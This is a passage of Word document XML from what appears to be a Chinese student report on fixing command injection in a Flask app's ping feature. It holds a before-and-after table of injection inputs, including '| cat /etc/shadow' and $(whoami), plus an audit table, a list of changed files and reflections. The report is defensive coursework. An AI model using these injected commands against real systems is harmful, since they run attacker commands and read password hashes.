                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>绕过手法</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
            <w:shd w:fill="D9E2F3" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>修复前</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
            <w:shd w:fill="D9E2F3" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>修复后</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>分号 ; id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>命令执行成功</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>已拦截（白名单）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>管道 | cat /etc/shadow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>读取系统文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>已拦截（白名单）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>反引号 `id`</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>命令执行成功</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>已拦截（白名单）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>子 Shell $(whoami)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>命令执行成功</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>已拦截（白名单）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>换行符 \n</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>命令执行成功</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>已拦截（白名单）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>四、命令注入安全审计总表</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>对项目中所有涉及系统命令执行的代码路径逐条审查：</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1"/>
        <w:gridCol w:w="2161"/>
        <w:gridCol w:w="2161"/>
        <w:gridCol w:w="2161"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2161"/>
            <w:shd w:fill="D9E2F3" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>路由/功能</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2161"/>
            <w:shd w:fill="D9E2F3" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>执行方式</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2161"/>
            <w:shd w:fill="D9E2F3" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>修复方式</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2161"/>
            <w:shd w:fill="D9E2F3" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>状态</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2161"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>/ping Ping测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2161"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>subprocess 列表参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2161"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>四层防御：CSRF+去shell+白名单+DNS预解析</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2161"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>已修复</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2161"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>/fetch-url 抓取</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2161"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>urllib.request（纯 Python）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2161"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>协议+IP+CRLF+速率限制（非命令执行）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2161"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>安全</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2161"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>/upload 上传</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2161"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Pillow 解码（纯 Python）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2161"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>无需系统命令</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2161"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>安全</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>五、修改文件清单</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3"/>
        <w:gridCol w:w="4323"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4323"/>
            <w:shd w:fill="D9E2F3" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4323"/>
            <w:shd w:fill="D9E2F3" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>操作说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4323"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>app.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4323"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>新增 import: subprocess, platform</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4323"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>app.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4323"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>新增 _is_valid_ping_target() 字符白名单校验函数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4323"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>app.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4323"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>新增 _PING_IP_RE / _PING_HOSTNAME_RE 正则常量</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4323"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>app.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4323"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>修改 ping() 路由：添加 _check_csrf() CSRF校验</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4323"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>app.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4323"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>修改 ping() 路由：f-string+shell=True → 列表参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4323"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>app.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4323"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>修改 ping() 路由：新增 DNS 预解析校验</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4323"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>templates/ping.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4323"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>新增 Ping 测试页面（CSRF隐藏域+黑底绿字终端风格）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4323"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>templates/base.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4323"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>导航栏新增"Ping测试"入口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4323"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>templates/index.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4323"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>首页新增"Ping测试"快捷按钮</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>六、心得体会</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>通过本次作业，我对命令注入漏洞的形成原理和防御手段有了深刻的理解。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">命令注入漏洞的根本原因在于用户输入被当作操作系统命令的一部分执行。与 SQL 注入、路径穿越一样，都是"数据与指令未分离"的问题。在命令注入中，最大的风险源是 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>shell=True</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
